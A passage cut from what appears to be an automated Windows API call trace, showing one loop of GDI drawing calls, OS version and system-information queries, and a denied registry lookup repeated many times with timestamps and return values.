hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.105] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.105] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.105] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.105] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.105] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.105] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xea0401d3 [0088.105] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe80401d6 [0088.105] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e91 [0088.105] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e92 [0088.105] CombineRgn (hrgnDst=0x1040e91, hrgnSrc1=0xea0401d3, hrgnSrc2=0xe80401d6, iMode=1) returned 1 [0088.105] CombineRgn (hrgnDst=0x1040e92, hrgnSrc1=0xea0401d3, hrgnSrc2=0xe80401d6, iMode=4) returned 2 [0088.105] CreateSolidBrush (color=0xff) returned 0x2100e90 [0088.105] CreateSolidBrush (color=0xff0000) returned 0x1100e93 [0088.105] DeleteObject (ho=0x1100e93) returned 1 [0088.105] DeleteObject (ho=0xe80401d6) returned 1 [0088.105] DeleteObject (ho=0xea0401d3) returned 1 [0088.105] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.105] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.105] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.105] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.105] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.105] BeginPath (hdc=0x0) returned 0 [0088.105] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.106] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.106] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.106] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.106] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.106] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.106] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.106] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe90401d6 [0088.106] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xeb0401d3 [0088.106] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e94 [0088.106] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e95 [0088.106] CombineRgn (hrgnDst=0x1040e94, hrgnSrc1=0xe90401d6, hrgnSrc2=0xeb0401d3, iMode=1) returned 1 [0088.106] CombineRgn (hrgnDst=0x1040e95, hrgnSrc1=0xe90401d6, hrgnSrc2=0xeb0401d3, iMode=4) returned 2 [0088.106] CreateSolidBrush (color=0xff) returned 0x2100e93 [0088.106] CreateSolidBrush (color=0xff0000) returned 0x1100e96 [0088.106] DeleteObject (ho=0x1100e96) returned 1 [0088.106] DeleteObject (ho=0xeb0401d3) returned 1 [0088.106] DeleteObject (ho=0xe90401d6) returned 1 [0088.106] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.106] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.106] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.106] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.106] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.106] BeginPath (hdc=0x0) returned 0 [0088.106] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.106] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.106] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.106] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.106] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.106] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.106] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.106] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xec0401d3 [0088.106] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xea0401d6 [0088.107] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e97 [0088.107] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e98 [0088.107] CombineRgn (hrgnDst=0x1040e97, hrgnSrc1=0xec0401d3, hrgnSrc2=0xea0401d6, iMode=1) returned 1 [0088.107] CombineRgn (hrgnDst=0x1040e98, hrgnSrc1=0xec0401d3, hrgnSrc2=0xea0401d6, iMode=4) returned 2 [0088.107] CreateSolidBrush (color=0xff) returned 0x2100e96 [0088.107] CreateSolidBrush (color=0xff0000) returned 0x1100e99 [0088.107] DeleteObject (ho=0x1100e99) returned 1 [0088.107] DeleteObject (ho=0xea0401d6) returned 1 [0088.107] DeleteObject (ho=0xec0401d3) returned 1 [0088.107] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.107] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.107] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.107] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.107] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.107] BeginPath (hdc=0x0) returned 0 [0088.107] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.107] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.107] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.107] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.107] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.107] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.107] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.107] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.107] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xeb0401d6 [0088.107] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xed0401d3 [0088.107] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e9a [0088.107] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e9b [0088.107] CombineRgn (hrgnDst=0x1040e9a, hrgnSrc1=0xeb0401d6, hrgnSrc2=0xed0401d3, iMode=1) returned 1 [0088.107] CombineRgn (hrgnDst=0x1040e9b, hrgnSrc1=0xeb0401d6, hrgnSrc2=0xed0401d3, iMode=4) returned 2 [0088.107] CreateSolidBrush (color=0xff) returned 0x2100e99 [0088.107] CreateSolidBrush (color=0xff0000) returned 0x1100e9c [0088.107] DeleteObject (ho=0x1100e9c) returned 1 [0088.107] DeleteObject (ho=0xed0401d3) returned 1 [0088.107] DeleteObject (ho=0xeb0401d6) returned 1 [0088.107] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.107] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.108] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.108] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.108] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.108] BeginPath (hdc=0x0) returned 0 [0088.108] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.108] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.108] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.108] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.108] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.108] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.108] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.108] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xee0401d3 [0088.108] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xec0401d6 [0088.108] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e9d [0088.108] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e9e [0088.108] CombineRgn (hrgnDst=0x1040e9d, hrgnSrc1=0xee0401d3, hrgnSrc2=0xec0401d6, iMode=1) returned 1 [0088.108] CombineRgn (hrgnDst=0x1040e9e, hrgnSrc1=0xee0401d3, hrgnSrc2=0xec0401d6, iMode=4) returned 2 [0088.108] CreateSolidBrush (color=0xff) returned 0x2100e9c [0088.108] CreateSolidBrush (color=0xff0000) returned 0x1100e9f [0088.108] DeleteObject (ho=0x1100e9f) returned 1 [0088.108] DeleteObject (ho=0xec0401d6) returned 1 [0088.108] DeleteObject (ho=0xee0401d3) returned 1 [0088.108] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.108] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.108] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.108] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.108] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.108] BeginPath (hdc=0x0) returned 0 [0088.108] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.108] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.108] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.108] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.108] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.108] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.108] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.109] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xed0401d6 [0088.109] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xef0401d3 [0088.109] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ea0 [0088.109] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ea1 [0088.109] CombineRgn (hrgnDst=0x1040ea0, hrgnSrc1=0xed0401d6, hrgnSrc2=0xef0401d3, iMode=1) returned 1 [0088.109] CombineRgn (hrgnDst=0x1040ea1, hrgnSrc1=0xed0401d6, hrgnSrc2=0xef0401d3, iMode=4) returned 2 [0088.109] CreateSolidBrush (color=0xff) returned 0x2100e9f [0088.109] CreateSolidBrush (color=0xff0000) returned 0x1100ea2 [0088.109] DeleteObject (ho=0x1100ea2) returned 1 [0088.109] DeleteObject (ho=0xef0401d3) returned 1 [0088.109] DeleteObject (ho=0xed0401d6) returned 1 [0088.109] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.109] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.109] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.109] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.109] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.109] BeginPath (hdc=0x0) returned 0 [0088.109] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.109] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.109] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.109] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.109] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.109] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.109] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.109] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf00401d3 [0088.109] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xee0401d6 [0088.109] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ea3 [0088.109] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ea4 [0088.109] CombineRgn (hrgnDst=0x1040ea3, hrgnSrc1=0xf00401d3, hrgnSrc2=0xee0401d6, iMode=1) returned 1 [0088.109] CombineRgn (hrgnDst=0x1040ea4, hrgnSrc1=0xf00401d3, hrgnSrc2=0xee0401d6, iMode=4) returned 2 [0088.109] CreateSolidBrush (color=0xff) returned 0x2100ea2 [0088.109] CreateSolidBrush (color=0xff0000) returned 0x1100ea5 [0088.109] DeleteObject (ho=0x1100ea5) returned 1 [0088.109] DeleteObject (ho=0xee0401d6) returned 1 [0088.110] DeleteObject (ho=0xf00401d3) returned 1 [0088.110] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.110] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.110] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.110] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.110] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.110] BeginPath (hdc=0x0) returned 0 [0088.110] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.110] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.110] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.110] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.110] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.110] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.110] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.110] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.110] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xef0401d6 [0088.110] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf10401d3 [0088.110] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ea6 [0088.110] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ea7 [0088.110] CombineRgn (hrgnDst=0x1040ea6, hrgnSrc1=0xef0401d6, hrgnSrc2=0xf10401d3, iMode=1) returned 1 [0088.110] CombineRgn (hrgnDst=0x1040ea7, hrgnSrc1=0xef0401d6, hrgnSrc2=0xf10401d3, iMode=4) returned 2 [0088.110] CreateSolidBrush (color=0xff) returned 0x2100ea5 [0088.110] CreateSolidBrush (color=0xff0000) returned 0x1100ea8 [0088.110] DeleteObject (ho=0x1100ea8) returned 1 [0088.110] DeleteObject (ho=0xf10401d3) returned 1 [0088.110] DeleteObject (ho=0xef0401d6) returned 1 [0088.110] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.110] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.110] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.110] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.110] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.110] BeginPath (hdc=0x0) returned 0 [0088.110] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.110] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.110] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.110] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.110] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.111] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.111] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.111] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf20401d3 [0088.111] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf00401d6 [0088.111] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ea9 [0088.111] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eaa [0088.111] CombineRgn (hrgnDst=0x1040ea9, hrgnSrc1=0xf20401d3, hrgnSrc2=0xf00401d6, iMode=1) returned 1 [0088.111] CombineRgn (hrgnDst=0x1040eaa, hrgnSrc1=0xf20401d3, hrgnSrc2=0xf00401d6, iMode=4) returned 2 [0088.111] CreateSolidBrush (color=0xff) returned 0x2100ea8 [0088.111] CreateSolidBrush (color=0xff0000) returned 0x1100eab [0088.111] DeleteObject (ho=0x1100eab) returned 1 [0088.111] DeleteObject (ho=0xf00401d6) returned 1 [0088.111] DeleteObject (ho=0xf20401d3) returned 1 [0088.111] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.111] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.111] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.111] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.111] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.111] BeginPath (hdc=0x0) returned 0 [0088.111] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.111] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.111] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.111] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.111] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.111] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.111] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.111] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf10401d6 [0088.111] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf30401d3 [0088.111] CreateRectRgn (x1=0, y1=0, x2=0, 